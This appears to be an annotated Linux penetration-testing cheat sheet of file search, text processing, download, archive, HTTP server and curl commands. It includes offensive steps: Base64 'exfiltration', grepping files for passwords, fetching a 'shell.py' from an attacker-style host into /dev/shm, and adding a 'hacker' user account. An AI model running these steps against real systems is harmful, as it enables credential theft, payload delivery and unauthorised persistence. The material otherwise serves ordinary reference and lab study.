Linux
PE Tool
Commands
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng
GitHub
# Exfiltration using Base64
# -w 0 turns off line wrapping (GNU coreutils), so the file comes out as one
# line of text. Base64 is an encoding, not encryption: anyone who sees the
# output can recover the content.
base64 -w 0 < file
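# Find a file
# List the current directory only, without descending. The explicit "." keeps
# the command working on find implementations that require a start path.
find . -maxdepth 1
# Regular files, then directories, below the current directory.
find ./ -type f
find ./ -type d
# Quote the pattern so find receives it; unquoted, the shell expands abc*
# against the current directory before find ever runs.
find ./ -name 'abc*'
# Names of .txt files containing "password", searched recursively. A bare
# *.txt glob would only match entries in the current directory, which is
# presumably not what -R was meant to do.
grep -lR --include='*.txt' password .
# 2>/dev/null discards error output such as permission-denied messages.
find ./ -name webmin 2>/dev/null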
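# Query files with cut / awk / sort / uniq
# Option dashes must be the ASCII "-"; a typographic en dash is not recognised
# as an option prefix and the command fails.
# First colon-separated field (the account name) of every /etc/passwd entry.
cut -d ":" -f 1 /etc/passwd
# awk accepts a multi-character field separator; prints fields 1 and 3.
echo "hello::there::firend" | awk -F "::" '{print $1, $3}'
# Count occurrences of the first space-separated field of access.log (the
# client address in common access-log formats), busiest first.
# sort -rn, not -urn: combined with -n, -u keeps a single line per distinct
# count and silently drops every other entry with the same number of hits.
cut -d " " -f 1 access.log | sort | uniq -c | sort -rn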
# Get a hex dump without newlines
# xxd -p emits plain hex wrapped into lines; tr removes the line breaks so the
# result is one continuous string.
xxd -p boot12.bin \
  | tr -d '\n'
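# Count
# "file" is a placeholder name. Written as <file>, the angle brackets are
# parsed by the shell as redirections and the line is a syntax error.
wc -l file  # lines (newline characters) in "file"
wc -c       # bytes read from stdin; wc -m counts characters instead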
# Sort
sort -nr  # numeric sort, highest value first
# Sort and drop duplicate lines in a single step.
sort -u file
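# Compare files
# comm expects both inputs to be sorted; on unsorted input its columns are
# wrong, so sort each file on the fly.
# Output columns: lines only in fileA, lines only in fileB, lines in both.
# Process substitution needs bash, zsh or ksh.
comm <(sort fileA.txt) <(sort fileB.txt)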
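# Download
wget 10.10.14.14:8000/shell.py
# -b takes cookie data as "name=value", or a file name to read cookies from
#    when the argument contains no "=".
# -o writes the response body to /dev/shm/shell.py.
# -k (--insecure) makes curl skip TLS certificate verification, so the server
#    is not authenticated and the content can be altered in transit. The wget
#    line above uses plain HTTP and has the same property. Compare the file
#    against a known-good checksum (e.g. sha256sum) before running it.
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py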
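# Unpack archives
# Archives from untrusted sources can carry entries with absolute or ../
# paths. List the contents first (tar -tf, unzip -l, 7z l) and extract into an
# empty directory.
tar -xvzf /path/to/yourfile.tgz  # gzip-compressed tar
tar -xvjf /path/to/yourfile.tbz  # bzip2-compressed tar
bzip2 -d /path/to/yourfile.bz2
tar -xjf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
# "x" is 7z's extract-with-full-paths command; -x is its exclude switch and
# is not a command on its own.
7z x file.7z
# && so that unxz only runs when the package install succeeded.
sudo apt-get install xz-utils && unxz file.xz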
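# Add new user
# useradd -p expects an already-hashed password, so the openssl call has to
# run as a command substitution. Inside plain single quotes the literal text
# is stored as the hash and no password will ever match it.
# openssl passwd -1 produces MD5-crypt, which is weak by current standards
# (-6 selects SHA-512-crypt), and the password is visible in the process list
# while the command runs.
# The new account shows up in /etc/passwd; account creation is a standard
# event to alert on.
useradd -p "$(openssl passwd -1 '<Password>')" hacker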
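# HTTP servers
# Each of these serves the current directory, without authentication or TLS,
# to every host that can reach the port. Ports below 1024 normally need root.
python -m SimpleHTTPServer 80  # Python 2
# Python 3: listens on port 8000 on all interfaces unless told otherwise;
# add "--bind 127.0.0.1" to keep it local.
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
# $ip must hold the address to listen on; quoted so that an empty or unusual
# value is not word-split by the shell.
php -S "${ip}:80"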
## Curl
# Both examples use plain http://, so the credentials and the bearer token
# cross the network unencrypted; values given on the command line are also
# visible in the process list.

# POST a JSON body
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"password":"password", "username":"admin"}' \
  http://host:3000/endpoint

# Authenticate with a JWT bearer token
curl --request GET \
  --header 'Authorization: Bearer <JWT>' \
  http://host:3000/endpoint
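# Send email
# -t recipient, -f sender, -s SMTP server, -u subject, -a attachment.
# The two addresses are constructed placeholders: the page's own values were
# replaced by e-mail obfuscation and cannot be recovered.
# You will be prompted for the message content.
sendEmail -t 'recipient@example.com' -f 'sender@example.com' -s 192.168.8.131 -u Subject -a file.pdf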
# Copy a binary file without its first X (28) bytes
# With bs=28, skip=1 skips exactly one 28-byte input block, i.e. the first 28
# bytes; set bs to the number of bytes to drop.
# (tail -c +29 file.bin > blob produces the same output.)
dd if=file.bin of=blob skip=1 bs=28